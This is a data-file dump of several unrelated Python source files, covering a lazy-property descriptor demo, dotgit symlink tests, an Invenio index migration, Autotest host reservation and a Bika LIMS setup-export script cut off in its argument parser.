code
stringlengths 1
199k
|
|---|
class lazyproperty:
def __init__(self, func):
self.func = func
def __get__(self, instance, cls):
if instance is None:
return self
else:
value = self.func(instance)
setattr(instance, self.func.__name__, value)
return value
import math
class Circle:
def __init__(self, radius):
self.radius = radius
@lazyproperty
def area(self):
print('Computing area')
return math.pi * self.radius ** 2
@lazyproperty
def perimeter(self):
print('Computing perimeter')
return 2 * math.pi * self.radius
c = Circle(4.0)
print(c.radius)
print(c.area)
print(c.area)
del c.area
print(vars(c))
c.area
print(c.perimeter)
print(c.perimeter)
c.area = 25
print(c.area)
def lazyproperty(func):
name = '_lazy_' + func.__name__
@property
def lazy(self):
if hasattr(self, name):
return getattr(self, name)
else:
value = func(self)
setattr(self, name, value)
return value
return lazy
class Circle:
def __init__(self, radius):
self.radius = radius
@lazyproperty
def area(self):
print('Computing area')
return math.pi * self.radius ** 2
c = Circle(4.0)
print(c.area)
print(c.area)
c.area = 25
|
'''
JSON router wrapper
'''
from __future__ import absolute_import, print_function, with_statement
from .base import JsonObjectWrapper
__all__ = ('JsonRouterMinimal', 'JsonRouter')
class JsonRouter(JsonObjectWrapper):
'''
JSON wrapper for Router
'''
attributes = (
'name',
'unique_name',
'modified',
'location',
'flags',
'bandwidth',
'policy',
'ip',
'id_hex'
)
def as_dict(self):
result = super(JsonRouter, self).as_dict()
result['id'] = result.pop('id_hex')[1:]
return result
class JsonRouterMinimal(JsonRouter):
'''
Minimal JSON wrapper for router.
'''
attributes = (
'name',
'id_hex',
'ip',
'location'
)
|
"""
Created on Thu Mar 10 00:09:52 2016
@author: Zahari Kassabov
"""
import pathlib
import logging
from collections.abc import Sequence
import shutil
log = logging.getLogger(__name__)
class EnvironmentError_(Exception): pass
available_figure_formats = {
'eps': 'Encapsulated Postscript',
'jpeg': 'Joint Photographic Experts Group',
'jpg': 'Joint Photographic Experts Group',
'pdf': 'Portable Document Format',
'pgf': 'PGF code for LaTeX',
'png': 'Portable Network Graphics',
'ps': 'Postscript',
'raw': 'Raw RGBA bitmap',
'rgba': 'Raw RGBA bitmap',
'svg': 'Scalable Vector Graphics',
'svgz': 'Scalable Vector Graphics',
'tif': 'Tagged Image File Format',
'tiff': 'Tagged Image File Format'
}
class Environment:
def __init__(self, *, output=None, formats=('pdf',),
default_figure_format=None, loglevel=logging.DEBUG,
config_yml = None,
folder_prefix=False,
**kwargs):
if output:
self.output_path = pathlib.Path(output).absolute()
else:
self.output_path = output
self.figure_formats = formats
self._default_figure_format = default_figure_format
self.loglevel = loglevel
self.extra_args = kwargs
self.config_yml = config_yml
if folder_prefix and config_yml:
self.filename_prefix = pathlib.Path(config_yml).stem
else:
self.filename_prefix = None
@property
def figure_formats(self):
return self._figure_formats
@property
def default_figure_format(self):
if self._default_figure_format is None:
return self.figure_formats[0]
else:
return self._default_figure_format
@property
def config_rel_path(self):
"""A relative path with respect to the config file, or the current
PWD as a fallback."""
if self.config_yml:
return pathlib.Path(self.config_yml).parent
return pathlib.Path('.')
@default_figure_format.setter
def default_figure_format(self, fmt):
self._default_figure_format = fmt
@figure_formats.setter
def figure_formats(self, figure_formats):
if isinstance(figure_formats, str):
figure_formats = (figure_formats,)
if not isinstance(figure_formats, Sequence):
raise EnvironmentError_("Bad figure format specification: %s. "
"Must be a string or a list." % figure_formats)
bad_formats = set(figure_formats) - set(available_figure_formats)
if bad_formats:
raise EnvironmentError_("The following are not valid figure"
"formats %s:\nIt must be one of:\n%s" % (bad_formats,
'\n'.join('%s: %s'%(k,v) for k,v in available_figure_formats.items())))
self._figure_formats = figure_formats
def init_output(self):
if self.output_path and self.output_path.is_dir():
log.warning("Output folder exists: %s Overwriting contents" %
self.output_path)
else:
try:
self.output_path.mkdir()
except OSError as e:
raise EnvironmentError_(e) from e
self.input_folder = self.output_path/'input'
self.input_folder.mkdir(exist_ok=True)
if self.config_yml:
try:
shutil.copy2(self.config_yml, self.input_folder/'runcard.yaml')
except shutil.SameFileError:
pass
#TODO: Decide if we want to create these always or not
self.figure_folder = (self.output_path/'figures')
self.figure_folder.mkdir(exist_ok=True)
self.table_folder = (self.output_path/'tables')
self.table_folder.mkdir(exist_ok=True)
def get_figure_paths(self, handle):
for fmt in self.figure_formats:
yield self.figure_folder / (handle + '.' + fmt)
@classmethod
def ns_dump_description(cls):
return dict(
output_path = "Folder where the results are to be written.",
config_rel_path = cls.config_rel_path.__doc__,
filename_prefix = "Prefix prepended to filenames",
)
def ns_dump(self):
return {k: getattr(self, k) for k in self.ns_dump_description()
if getattr(self, k) is not None}
|
import os
from pathlib import Path
from dotgit.calc_ops import CalcOps
from dotgit.file_ops import FileOps
from dotgit.plugins.plain import PlainPlugin
class TestCalcOps:
def setup_home_repo(self, tmp_path):
os.makedirs(tmp_path / 'home')
os.makedirs(tmp_path / 'repo')
return tmp_path/'home', tmp_path/'repo'
def test_update_no_cands(self, tmp_path, caplog):
home, repo = self.setup_home_repo(tmp_path)
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.update({'file': ['cat1', 'cat2']})
assert 'unable to find any candidates' in caplog.text
def test_update_master_noslave(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1')
open(repo / 'cat1' / 'file', 'w').close()
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.update({'file': ['cat1', 'cat2']}).apply()
assert (repo / 'cat1').is_dir()
assert not (repo / 'cat1' / 'file').is_symlink()
assert (repo / 'cat2').is_dir()
assert (repo / 'cat2' / 'file').is_symlink()
assert (repo / 'cat2' / 'file').samefile(repo / 'cat1' / 'file')
def test_update_nomaster_slave(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat2')
open(repo / 'cat2' / 'file', 'w').close()
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.update({'file': ['cat1', 'cat2']}).apply()
assert (repo / 'cat1').is_dir()
assert not (repo / 'cat1' / 'file').is_symlink()
assert (repo / 'cat2').is_dir()
assert (repo / 'cat2' / 'file').is_symlink()
assert (repo / 'cat2' / 'file').samefile(repo / 'cat1' / 'file')
def test_update_master_linkedslave(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1')
os.makedirs(repo / 'cat2')
open(repo / 'cat1' / 'file', 'w').close()
os.symlink(Path('..') / 'cat1' / 'file', repo / 'cat2' / 'file')
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
assert calc.update({'file': ['cat1', 'cat2']}).ops == []
def test_update_master_brokenlinkslave(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1')
os.makedirs(repo / 'cat2')
open(repo / 'cat1' / 'file', 'w').close()
os.symlink(Path('..') / 'cat1' / 'nonexistent', repo / 'cat2' / 'file')
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.update({'file': ['cat1', 'cat2']}).apply()
assert (repo / 'cat1').is_dir()
assert not (repo / 'cat1' / 'file').is_symlink()
assert (repo / 'cat2').is_dir()
assert (repo / 'cat2' / 'file').is_symlink()
assert (repo / 'cat2' / 'file').samefile(repo / 'cat1' / 'file')
def test_update_home_nomaster_noslave(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
open(home / 'file', 'w').close()
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.update({'file': ['cat1', 'cat2']}).apply()
assert (repo / 'cat1').is_dir()
assert not (repo / 'cat1' / 'file').is_symlink()
assert (repo / 'cat2').is_dir()
assert (repo / 'cat2' / 'file').is_symlink()
assert (repo / 'cat2' / 'file').samefile(repo / 'cat1' / 'file')
assert not (home / 'file').exists()
def test_update_linkedhome_master_noslave(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1')
open(repo / 'cat1' / 'file', 'w').close()
os.symlink(repo / 'cat1' / 'file', home / 'file')
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.update({'file': ['cat1', 'cat2']}).apply()
assert (repo / 'cat1').is_dir()
assert not (repo / 'cat1' / 'file').is_symlink()
assert (repo / 'cat2').is_dir()
assert (repo / 'cat2' / 'file').is_symlink()
assert (repo / 'cat2' / 'file').samefile(repo / 'cat1' / 'file')
assert (home / 'file').is_symlink()
assert (home / 'file').samefile(repo / 'cat1' / 'file')
def test_update_externallinkedhome_nomaster_noslave(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
(home / 'foo').touch()
(home / 'file').symlink_to(home / 'foo')
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.update({'file': ['cat']}).apply()
assert (repo / 'cat').is_dir()
assert (repo / 'cat' / 'file').exists()
assert not (repo / 'cat' / 'file').is_symlink()
calc.restore({'file': ['cat']}).apply()
assert (home / 'file').is_symlink()
assert (home / 'file').samefile(repo / 'cat' / 'file')
assert repo in (home / 'file').resolve().parents
assert (home / 'foo').exists()
assert not (home / 'foo').is_symlink()
def test_update_changed_master(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat2')
os.makedirs(repo / 'cat3')
open(repo / 'cat2' / 'file', 'w').close()
os.symlink(Path('..') / 'cat2' / 'file', repo / 'cat3' / 'file')
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.update({'file': ['cat1', 'cat2', 'cat3']}).apply()
assert (repo / 'cat1').is_dir()
assert not (repo / 'cat1' / 'file').is_symlink()
assert (repo / 'cat2').is_dir()
assert (repo / 'cat2' / 'file').is_symlink()
assert (repo / 'cat2' / 'file').samefile(repo / 'cat1' / 'file')
assert (repo / 'cat3').is_dir()
assert (repo / 'cat3' / 'file').is_symlink()
assert (repo / 'cat3' / 'file').samefile(repo / 'cat1' / 'file')
def test_update_multiple_candidates(self, tmp_path, monkeypatch):
home, repo = self.setup_home_repo(tmp_path)
(repo / 'cat1').mkdir()
(repo / 'cat2').mkdir()
(repo / 'cat1' / 'file').write_text('file1')
(repo / 'cat2' / 'file').write_text('file2')
monkeypatch.setattr('builtins.input', lambda p: '1')
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.update({'file': ['cat1', 'cat2']}).apply()
assert (repo / 'cat1' / 'file').exists()
assert not (repo / 'cat1' / 'file').is_symlink()
assert (repo / 'cat2' / 'file').is_symlink()
def test_restore_nomaster_nohome(self, tmp_path, caplog):
home, repo = self.setup_home_repo(tmp_path)
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.restore({'file': ['cat1', 'cat2']}).apply()
assert 'unable to find "file" in repo, skipping' in caplog.text
assert not (home / 'file').is_file()
def test_restore_nomaster_home(self, tmp_path, caplog):
home, repo = self.setup_home_repo(tmp_path)
open(home / 'file', 'w').close()
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.restore({'file': ['cat1', 'cat2']}).apply()
assert 'unable to find "file" in repo, skipping' in caplog.text
assert (home / 'file').is_file()
def test_restore_master_nohome(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1')
open(repo / 'cat1' / 'file', 'w').close()
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.restore({'file': ['cat1', 'cat2']}).apply()
assert (home / 'file').is_file()
assert (home / 'file').is_symlink()
assert (home / 'file').samefile(repo / 'cat1' / 'file')
assert not (repo / 'cat1' / 'file').is_symlink()
def test_restore_master_linkedhome(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1')
open(repo / 'cat1' / 'file', 'w').close()
os.symlink(repo / 'cat1' / 'file', home / 'file')
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
fops = calc.restore({'file': ['cat1', 'cat2']})
assert fops.ops == []
def test_restore_master_home_replace(self, tmp_path, monkeypatch):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1')
open(repo / 'cat1' / 'file', 'w').close()
open(home / 'file', 'w').close()
monkeypatch.setattr('builtins.input', lambda p: 'y')
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.restore({'file': ['cat1', 'cat2']}).apply()
assert (home / 'file').is_file()
assert (home / 'file').is_symlink()
assert (home / 'file').samefile(repo / 'cat1' / 'file')
assert not (repo / 'cat1' / 'file').is_symlink()
def test_restore_master_home_noreplace(self, tmp_path, monkeypatch):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1')
open(repo / 'cat1' / 'file', 'w').close()
open(home / 'file', 'w').close()
monkeypatch.setattr('builtins.input', lambda p: 'n')
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.restore({'file': ['cat1', 'cat2']}).apply()
assert (home / 'file').is_file()
assert not (home / 'file').is_symlink()
assert (repo / 'cat1' / 'file').is_file()
assert not (repo / 'cat1' / 'file').is_symlink()
def test_restore_dangling_home(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat')
(repo / 'cat' / 'foo').touch()
(home / 'foo').symlink_to('/non/existent/path')
assert not (home / 'foo').exists()
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.restore({'foo': ['cat']}).apply()
assert (home / 'foo').is_symlink()
assert (home / 'foo').exists()
def test_clean_nohome(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1')
open(repo / 'cat1' / 'file', 'w').close()
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.clean({'file': ['cat1', 'cat2']}).apply()
assert not (home / 'file').is_file()
assert (repo / 'cat1' / 'file').is_file()
def test_clean_linkedhome(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1')
open(repo / 'cat1' / 'file', 'w').close()
os.symlink(repo / 'cat1' / 'file', home / 'file')
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.clean({'file': ['cat1', 'cat2']}).apply()
assert not (home / 'file').is_file()
assert (repo / 'cat1' / 'file').is_file()
def test_clean_linkedotherhome(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1')
open(repo / 'cat1' / 'file', 'w').close()
os.symlink(Path('cat1') / 'file', home / 'file')
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.clean({'file': ['cat1', 'cat2']}).apply()
assert (home / 'file').is_symlink()
assert (repo / 'cat1' / 'file').is_file()
def test_clean_filehome(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1')
open(repo / 'cat1' / 'file', 'w').close()
open(home / 'file', 'w').close()
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.clean({'file': ['cat1', 'cat2']}).apply()
assert (home / 'file').is_file()
assert not (home / 'file').is_symlink()
assert (repo / 'cat1' / 'file').is_file()
def test_clean_norepo_filehome(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
open(home / 'file', 'w').close()
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.clean({'file': ['cat1', 'cat2']}).apply()
assert (home / 'file').is_file()
assert not (home / 'file').is_symlink()
assert not (repo / 'cat1' / 'file').exists()
def test_clean_hard_nohome(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1')
open(repo / 'cat1' / 'file', 'w').close()
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data', hard=True))
calc.clean({'file': ['cat1', 'cat2']}).apply()
assert not (home / 'file').is_file()
assert (repo / 'cat1' / 'file').is_file()
def test_clean_hard_linkedhome(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1')
open(repo / 'cat1' / 'file', 'w').close()
os.symlink(repo / 'cat1' / 'file', home / 'file')
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data', hard=True))
calc.clean({'file': ['cat1', 'cat2']}).apply()
# shouldn't remove symlinks since they are not hard-copied files from
# the repo
assert (home / 'file').is_file()
assert (repo / 'cat1' / 'file').is_file()
def test_clean_hard_filehome(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1')
open(repo / 'cat1' / 'file', 'w').close()
open(home / 'file', 'w').close()
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data', hard=True))
calc.clean({'file': ['cat1', 'cat2']}).apply()
assert not (home / 'file').is_file()
assert (repo / 'cat1' / 'file').is_file()
def test_clean_hard_difffilehome(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1')
open(repo / 'cat1' / 'file', 'w').close()
with open(home / 'file', 'w') as f:
f.write('test data')
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data', hard=True))
calc.clean({'file': ['cat1', 'cat2']}).apply()
assert (home / 'file').is_file()
assert (home / 'file').read_text() == 'test data'
assert (repo / 'cat1' / 'file').is_file()
def test_clean_repo(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1')
open(repo / 'cat1' / 'file1', 'w').close()
open(repo / 'cat1' / 'file2', 'w').close()
os.makedirs(repo / 'cat2')
open(repo / 'cat2' / 'file1', 'w').close()
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.clean_repo(['cat1/file1']).apply()
assert (repo / 'cat1' / 'file1').is_file()
assert not (repo / 'cat1' / 'file2').is_file()
assert not (repo / 'cat2' / 'file2').is_file()
def test_clean_repo_dirs(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1' / 'empty')
assert (repo / 'cat1' / 'empty').is_dir()
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.clean_repo([]).apply()
assert not (repo / 'cat1' / 'empty').is_dir()
def test_clean_repo_categories(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1')
assert (repo / 'cat1').is_dir()
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.clean_repo([]).apply()
assert not (repo / 'cat1').is_dir()
def test_diff(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
(home / 'file').touch()
(home / 'file2').touch()
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data', hard=True))
calc.update({'file': ['common'], 'file2': ['common']}).apply()
calc.restore({'file': ['common'], 'file2': ['common']}).apply()
(home / 'file').write_text('hello world')
(home / 'file2').unlink()
assert calc.diff(['common']) == [f'modified {home / "file"}']
|
from paramecio.citoplasma.generate_admin_class import GenerateAdminClass
from paramecio.citoplasma.lists import SimpleList
from paramecio.citoplasma.urls import make_url
from modules.pastafari.models import servers, tasks
from settings import config
from bottle import request, redirect
def admin(**args):
t=args['t']
conn=args['connection']
url=make_url(config.admin_folder+'/pastafari/os')
os=servers.OsServer(conn)
admin=GenerateAdminClass(os, url, t)
return admin.show()
|
__author__ = "Julius Gawlas <julius.gawlas@hp.com>"
from autotest.frontend.afe import models
__all__ = ['create', 'release']
def get_user(username=None):
'''
Get the specificed user object or the current user if none is specified
:param username: login of the user reserving hosts
:type username: str
:returns: the user object for the given username
:rtype: :class:`models.User`
'''
if username:
user = models.User.objects.get(login=username)
else:
user = models.User.current_user()
return user
def create(hosts_to_reserve, username=None):
"""
Reserve hosts for user
:param hosts_to_reserve: strings or idents for hosts to reserve
:type hosts_to_reserve: list
:param username: login of the user reserving hosts
:type username: str
:raises: AclAccessViolation if user cannot reserve all specified hosts
"""
hosts = models.Host.smart_get_bulk(hosts_to_reserve)
if not hosts:
raise Exception("At least one host must be specified")
# check if this user can access specified hosts
user = get_user(username)
models.AclGroup.check_for_acl_violation_hosts(hosts, user.login)
user_acl, created = models.AclGroup.objects.get_or_create(name=user.login)
if created:
user_acl.users = [user]
user_acl.save()
for host in hosts:
host.aclgroup_set.add(user_acl)
# and add to reservation acl
user_acl.hosts.add(*hosts)
user_acl.on_host_membership_change()
def release(hosts_to_release, username=None):
"""
Release a collection of hosts from user
It's OK if user does not own these systems, in which case this does nothing
:param hosts_to_release: strings or idents for hosts to release
:type hosts_to_release: list
:param username: login of the user reserving hosts
:type username: str
"""
hosts = models.Host.smart_get_bulk(hosts_to_release)
if not hosts:
raise Exception("At least one host must be specified")
user = get_user(username)
acls = models.AclGroup.objects.filter(name=user.login)
if acls:
user_acl = acls[0]
user_acl.hosts.remove(*hosts)
user_acl.on_host_membership_change()
|
from invenio.dbquery import run_sql
depends_on = ['invenio_2013_08_20_bibauthority_updates']
def info():
return """Introduces new index: itemcount"""
def do_upgrade():
pass
def do_upgrade_atlantis():
#first step: create tables
run_sql("""CREATE TABLE IF NOT EXISTS idxWORD24F (
id mediumint(9) unsigned NOT NULL auto_increment,
term varchar(50) default NULL,
hitlist longblob,
PRIMARY KEY (id),
UNIQUE KEY term (term)
) ENGINE=MyISAM; """)
run_sql("""CREATE TABLE IF NOT EXISTS idxWORD24R (
id_bibrec mediumint(9) unsigned NOT NULL,
termlist longblob,
type enum('CURRENT','FUTURE','TEMPORARY') NOT NULL default 'CURRENT',
PRIMARY KEY (id_bibrec,type)
) ENGINE=MyISAM;""")
run_sql("""CREATE TABLE IF NOT EXISTS idxPAIR24F (
id mediumint(9) unsigned NOT NULL auto_increment,
term varchar(100) default NULL,
hitlist longblob,
PRIMARY KEY (id),
UNIQUE KEY term (term)
) ENGINE=MyISAM;""")
run_sql("""CREATE TABLE IF NOT EXISTS idxPAIR24R (
id_bibrec mediumint(9) unsigned NOT NULL,
termlist longblob,
type enum('CURRENT','FUTURE','TEMPORARY') NOT NULL default 'CURRENT',
PRIMARY KEY (id_bibrec,type)
) ENGINE=MyISAM;""")
run_sql("""CREATE TABLE IF NOT EXISTS idxPHRASE24F (
id mediumint(9) unsigned NOT NULL auto_increment,
term text default NULL,
hitlist longblob,
PRIMARY KEY (id),
KEY term (term(50))
) ENGINE=MyISAM;""")
run_sql("""CREATE TABLE IF NOT EXISTS idxPHRASE24R (
id_bibrec mediumint(9) unsigned NOT NULL,
termlist longblob,
type enum('CURRENT','FUTURE','TEMPORARY') NOT NULL default 'CURRENT',
PRIMARY KEY (id_bibrec,type)
) ENGINE=MyISAM;""")
#second step: fill in idxINDEX, idxINDEX_field, field tables
run_sql("""INSERT INTO field VALUES (37,'item count','itemcount')""") # kwalitee: disable=sql
run_sql("""INSERT INTO idxINDEX VALUES (24,'itemcount','This index contains number of copies of items in the library.','0000-00-00 00:00:00', '', 'native', '','No','No','No', 'BibIndexItemCountTokenizer')""") # kwalitee: disable=sql
run_sql("""INSERT INTO idxINDEX_field (id_idxINDEX, id_field) VALUES (24,37)""")
def estimate():
return 1
def pre_upgrade():
pass
def post_upgrade():
pass
|
from AccessControl.SecurityManagement import newSecurityManager
from Products.Archetypes import Field
from Products.CMFCore.utils import getToolByName
import argparse
import openpyxl
import os
import shutil
import tempfile
import zipfile
export_types = [
'Client',
'Contact',
'ARPriority',
'AnalysisProfile',
'ARTemplate',
'AnalysisCategory',
'AnalysisService',
'AnalysisSpec',
'AttachmentType',
'BatchLabel',
'Calculation',
'Container',
'ContainerType',
'Department',
'Instrument',
'InstrumentCalibration',
'InstrumentCertification',
'InstrumentMaintenanceTask',
'InstrumentScheduledTask',
'InstrumentType',
'InstrumentValidation',
'LabContact',
'LabProduct',
'Manufacturer',
'Method',
'Preservation',
'ReferenceDefinition',
'SampleCondition',
'SampleMatrix',
'StorageLocation',
'SamplePoint',
'SampleType',
'SamplingDeviation',
'SRTemplate',
'SubGroup',
'Supplier',
'SupplierContact',
'WorksheetTemplate',
#
'ARReport',
'Analysis',
'AnalysisRequest',
'Attachment',
'Batch',
'BatchFolder',
'Calculations',
'ClientFolder',
'DuplicateAnalysis',
'Invoice',
'InvoiceBatch',
'Pricelist',
'ReferenceAnalysis',
'ReferenceSample',
'RejectAnalysis',
'Sample',
'SamplePartition',
'SupplyOrder',
'SupplyOrderItem',
'Worksheet'
]
ignore_fields = [
# dublin
'constrainTypesMode',
'locallyAllowedTypes',
'immediatelyAddableTypes',
'subject',
'relatedItems',
'location',
'language',
'effectiveDate',
'modification_date',
'expirationDate',
'creators',
'contributors',
'rights',
'allowDiscussion',
'excludeFromNav',
'nextPreviousEnabled',
]
app = app # flake8: noqa
class Main:
def __init__(self, args):
self.args = args
# pose as user
self.user = app.acl_users.getUserById(args.username)
newSecurityManager(None, self.user)
# get portal object
self.portal = app.unrestrictedTraverse(args.sitepath)
self.proxy_cache = {}
def __call__(self):
"""Export entire bika site
"""
self.tempdir = tempfile.mkdtemp()
# Export into tempdir
self.wb = openpyxl.Workbook()
self.export_laboratory()
self.export_bika_setup()
for portal_type in export_types:
self.export_portal_type(portal_type)
self.wb.save(os.path.join(self.tempdir, 'setupdata.xlsx'))
# Create zip file
zf = zipfile.ZipFile(self.args.outputfile, 'w', zipfile.ZIP_DEFLATED)
for fname in os.listdir(self.tempdir):
zf.write(os.path.join(self.tempdir, fname), fname)
zf.close()
# Remove tempdir
shutil.rmtree(self.tempdir)
def get_catalog(self, portal_type):
# grab the first catalog we are indexed in
at = getToolByName(self.portal, 'archetype_tool')
return at.getCatalogsByType(portal_type)[0]
def get_fields(self, schema):
fields = []
for field in schema.fields():
if field.getName() in ignore_fields:
continue
if Field.IComputedField.providedBy(field):
continue
fields.append(field)
return fields
def write_dict_field_values(self, instance, field):
value = field.get(instance)
if type(value) == dict:
value = [value]
keys = value[0].keys()
# Create or obtain sheet for this field type's values
sheetname = '%s_values' % field.type
sheetname = sheetname[:31]
if sheetname in self.wb:
ws = self.wb[sheetname]
else:
ws = self.wb.create_sheet(title=sheetname)
ws.page_setup.fitToHeight = 0
ws.page_setup.fitToWidth = 1
ws.cell(column=1, row=1).value = "id"
ws.cell(column=2, row=1).value = "field"
for col, key in enumerate(keys):
cell = ws.cell(column=col + 3, row=1)
cell.value = key
nr_rows = len(ws.rows) + 1
for row, v in enumerate(value):
if not any(v.values()):
break
# source id/field
ws.cell(column=1, row=nr_rows + row).value = instance.id
ws.cell(column=2, row=nr_rows + row).value = field.getName()
for col, key in enumerate(keys):
c_value = v.get(key, '')
ws.cell(column=col + 3, row=nr_rows + row).value = c_value
return sheetname
def write_reference_values(self, instance, field):
values = field.get(instance)
# Create or obtain sheet for this relationship
sheetname = field.relationship[:31]
if sheetname in self.wb:
ws = self.wb[sheetname]
else:
ws = self.wb.create_sheet(title=sheetname)
ws.cell(column=1, row=1).value = "Source"
ws.cell(column=2, row=1).value = "Target"
nr_rows = len(ws.rows) + 1
for row, value in enumerate(values):
ws.cell(column=1, row=nr_rows + row).value = instance.id
ws.cell(column=2, row=nr_rows + row).value = value.id
return sheetname
def get_extension(self, mimetype):
"""Return first extension for mimetype, if any is found.
If no extension found, return ''
"""
mr = getToolByName(self.portal, "mimetypes_registry")
extension = ''
for ext, mt in mr.extensions.items():
if mimetype == mt:
extension = ext
return extension
def mutate(self, instance, field):
value = field.get(instance)
# Booleans are special; we'll str and return them.
if value is True or value is False:
return str(value)
# Zero is special: it's false-ish, but the value is important.
if value is 0:
return 0
# Other falsish values make empty cells.
if not value:
return ''
# Date fields get stringed to rfc8222
if Field.IDateTimeField.providedBy(field):
return value.rfc822() if value else None
# TextField implements IFileField, so we must handle it
# before IFileField. It's just returned verbatim.
elif Field.ITextField.providedBy(field):
return value
# Files get saved into tempdir, and the cell content is the filename
elif Field.IFileField.providedBy(field):
if not value.size:
return ''
extension = self.get_extension(value.content_type)
filename = value.filename if value.filename \
else instance.id + '-' + field.getName() + "." + extension
of = open(os.path.join(self.tempdir, filename), 'wb')
of.write(value.data)
of.close()
return filename
elif Field.IReferenceField.providedBy(field):
if field.multiValued:
return self.write_reference_values(instance, field)
else:
return value.id
elif Field.ILinesField.providedBy(field):
return "\n".join(value)
# depend on value of field, to decide mutation.
else:
value = field.get(instance)
# Dictionaries or lists of dictionaries
if type(value) == dict \
or (type(value) in (list, tuple)
and type(value[0]) == dict):
return self.write_dict_field_values(instance, field)
else:
return value
def export_laboratory(self):
instance = self.portal.bika_setup.laboratory
ws = self.wb.create_sheet(title='Laboratory')
ws.page_setup.fitToHeight = 0
ws.page_setup.fitToWidth = 1
fields = self.get_fields(instance.schema)
for row, field in enumerate(fields):
ws.cell(column=1, row=row + 1).value = field.getName()
value = self.mutate(instance, field)
ws.cell(column=2, row=row + 1).value = value
def export_bika_setup(self):
instance = self.portal.bika_setup
ws = self.wb.create_sheet(title='BikaSetup')
fields = self.get_fields(instance.schema)
for row, field in enumerate(fields):
ws.cell(column=1, row=row + 1).value = field.getName()
value = self.mutate(instance, field)
ws.cell(column=2, row=row + 1).value = value
def export_portal_type(self, portal_type):
catalog = self.get_catalog(portal_type)
brains = catalog(portal_type=portal_type)
if not brains:
print "No objects of type %s found in %s" % (portal_type, catalog)
return
ws = self.wb.create_sheet(title=portal_type)
# Write headers
instance = brains[0].getObject()
fields = self.get_fields(instance.schema)
headers = ['path', 'uid']
headers += [f.getName() for f in fields]
for col, header in enumerate(headers):
ws.cell(column=col + 1, row=1).value = header
# Write values
portal_path = '/'.join(self.portal.getPhysicalPath())
for row, brain in enumerate(brains):
instance = brain.getObject()
# path
path = '/'.join(instance.getPhysicalPath()[:-1])
ws.cell(column=1, row=row + 2).value = \
path.replace(portal_path, '')
# uid
ws.cell(column=2, row=row + 2).value = instance.UID()
# then schema field values
for col, field in enumerate(fields):
value = self.mutate(instance, field)
ws.cell(column=col + 3, row=row + 2).value = value
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='Export bika_setup into an Open XML (XLSX) workbook',
epilog='This script is meant to be run with zopepy or bin/instance.'
'See http://docs.plone.org/develop/plone/misc/commandline.html'
'for details.'
)
parser.add_argument(
'-s',
dest='sitepath',
default='Plone',
